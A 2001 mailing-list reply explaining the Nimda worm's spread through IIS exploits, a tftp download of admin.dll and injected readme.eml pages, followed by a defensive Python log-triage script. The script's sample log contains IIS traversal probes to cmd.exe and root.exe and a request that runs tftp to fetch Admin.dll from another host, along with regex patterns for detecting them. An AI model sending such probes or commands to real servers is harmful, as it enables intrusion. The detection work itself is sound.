What you have got there is one of the latest self-propagating viruses;
it can be read about at http://www.cert.org/advisories/CA-2001-26.html
What it does (for those that can't be bothered reading the advisory) is
scan through your subnet (class C, B, or A), and for each IP it finds it
tries to do about 16 different IIS exploits. Once you get infected via
that, it will attempt to tftp a file called admin.dll to your box and
then execute it. Once you get that, you are the not-so-proud owner of an
infected Windows NT/2000 server that will try to spawn more copies of
itself by that exact same method.

Also, once you are infected, your web server will attach something.eml
to every web page that it serves, and this .eml file will do the same
thing, i.e. perform a few registry hacks and possibly download
admin.dll. I am not totally sure on this, though; I understand roughly
how it works, but not in any exacting detail. Currently www.google.com
is even infected by this self-propagating virus.

There are patches for it out there, but this virus has hit very hard. It
will slow your link down regardless of your platform, as once infected,
a system will shoot out a massive number of requests. As an example of
this, one of our clients' bad request logs for the past 24 hrs have
shot up by something in the region of 60 times larger than those from 72
hours ago. This may also be a problem affecting one of the earlier posts
to this list (port 80 not resolving, from 'Michael Wilcox').

Regards

Michael Sim


Jeff wrote:

> I viewed the default web page on a machine known to be infected with Code
> Red II.  In doing so, another browser window that appeared to be blank
> popped open, and the address in the title bar showed the name 'readme.eml'.
> When I viewed the source of the page, this is the code that was
> contained therein, attached as 'readme.txt' just in case it is malicious
> and would affect others using MS Outlook to read this.
>
> Can anybody tell me what purpose this might serve?
>
>   ------------------------------------------------------------------------
>
> <HTML><HEAD></HEAD><BODY bgColor=#ffffff>
> <iframe src=cid:EA4DMGBP9p height=0 width=0>
> </iframe></BODY></HTML>

--
Michael Sim
System/Network Administrator
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Mobile:      +61 (0)413 417 822    Level 1, 3 Montague St
Phone:       +61 (0)2 9555 5666               Balmain NSW
Fax:         +61 (0)2 9555 5688           Australia  2041
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

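As an added example (not part of the thread above, and not code from CERT or either poster), the following Python script triages a web server's access log for the behaviour the thread describes: the burst of IIS exploit probes from a scanning host, the second-stage "tftp ... GET Admin.dll" request, and fetches of the .eml file an infected server serves. The probe URIs it recognises are the root.exe / cmd.exe traversal requests listed in CERT CA-2001-26; the decoder collapses the double-encoded forms (%255c, %%35c, %c1%1c) so one rule covers all of them. The log lines, the IP addresses and the PROBE_THRESHOLD value are constructed for illustration; the log format is assumed to be Apache/IIS-style combined format.

```python
"""Triage an access log for Nimda-style activity (CERT CA-2001-26).

Added example, not code from the mailing-list thread or from CERT.
Assumes Apache/IIS combined-format log lines; sample data is constructed.
"""
import re
from collections import Counter, defaultdict
from typing import Optional
from urllib.parse import unquote

# Combined-format prefix: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)
# Second stage per the advisory: cmd.exe/root.exe runs "tftp -i <host> GET Admin.dll".
TFTP_RE = re.compile(r'tftp\s+-i\s+(\d{1,3}(?:\.\d{1,3}){3})')
# Markup the worm appends to served pages (window.open from the advisory,
# the hidden cid: iframe from the readme.eml quoted in the thread).
INJECT_RE = re.compile(r'window\.open\(\s*"readme\.eml"', re.I)
IFRAME_RE = re.compile(r'<iframe\s+src=cid:[^>]*height=0\s+width=0', re.I)
PROBE_THRESHOLD = 3  # assumed: this many probes from one IP means it is scanning us

# Constructed sample log: one scanner, one second-stage hit, one .eml fetch.
SAMPLE_LOG = """\
10.0.0.7 - - [18/Sep/2001:10:01:02 +1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 216
10.0.0.7 - - [18/Sep/2001:10:01:02 +1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 216
10.0.0.7 - - [18/Sep/2001:10:01:03 +1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 216
10.0.0.7 - - [18/Sep/2001:10:01:03 +1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 216
10.0.0.7 - - [18/Sep/2001:10:01:04 +1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 216
10.0.0.7 - - [18/Sep/2001:10:01:04 +1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 216
10.0.0.9 - - [18/Sep/2001:10:05:10 +1000] "GET /scripts/root.exe?/c+tftp%20-i%2010.0.0.9%20GET%20Admin.dll%20c:\\Admin.dll HTTP/1.0" 200 0
192.0.2.44 - - [18/Sep/2001:10:06:00 +1000] "GET /index.html HTTP/1.1" 200 1043
192.0.2.44 - - [18/Sep/2001:10:06:01 +1000] "GET /readme.eml HTTP/1.1" 200 57344
"""


def decode_uri(uri: str) -> str:
    """Lower-case, percent-decode twice (so %255c and %%35c become a
    backslash) and fold backslashes to slashes, giving one canonical form."""
    s = uri.lower()
    for _ in range(2):
        s = unquote(s, errors="replace")
    return s.replace("\\", "/")


def classify(uri: str) -> Optional[str]:
    """Return 'stage2_tftp', 'probe', 'eml_fetch' or None for one request URI."""
    path, _, query = decode_uri(uri).partition("?")
    if "tftp" in query and "admin.dll" in query:
        return "stage2_tftp"          # worm pulling Admin.dll onto this host
    if "cmd.exe" in path or "root.exe" in path:
        return "probe"                # one of the advisory's IIS exploit URIs
    if path.endswith((".eml", ".nws")):
        return "eml_fetch"            # clients loading the injected page; check this server
    return None


def tftp_source(uri: str) -> Optional[str]:
    """Extract the host the worm tells tftp to fetch Admin.dll from."""
    m = TFTP_RE.search(decode_uri(uri))
    return m.group(1) if m else None


def looks_injected(html: str) -> bool:
    """True if served HTML carries the worm's readme.eml popup or hidden iframe."""
    return bool(INJECT_RE.search(html) or IFRAME_RE.search(html))


def summarize(lines):
    """Per-IP counts by kind, tftp sources seen, and IPs over the probe threshold."""
    by_ip = defaultdict(Counter)
    tftp_sources = set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify(m["uri"])
        if kind is None:
            continue
        by_ip[m["ip"]][kind] += 1
        if kind == "stage2_tftp":
            src = tftp_source(m["uri"])
            if src:
                tftp_sources.add(src)
    scanners = sorted(ip for ip, c in by_ip.items() if c["probe"] >= PROBE_THRESHOLD)
    return {
        "by_ip": {ip: dict(c) for ip, c in by_ip.items()},
        "tftp_sources": sorted(tftp_sources),
        "scanners": scanners,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE_LOG.splitlines()), indent=2))
```

Run it against a real log with `summarize(open("access.log").readlines())`. The scanner list is what the 60x jump in bad-request volume looks like per source, the tftp source list names hosts already infected (the worm fetches Admin.dll from the machine that attacked you), and `looks_injected` run over your own served pages is the quick check for whether the server itself is the one attaching readme.eml.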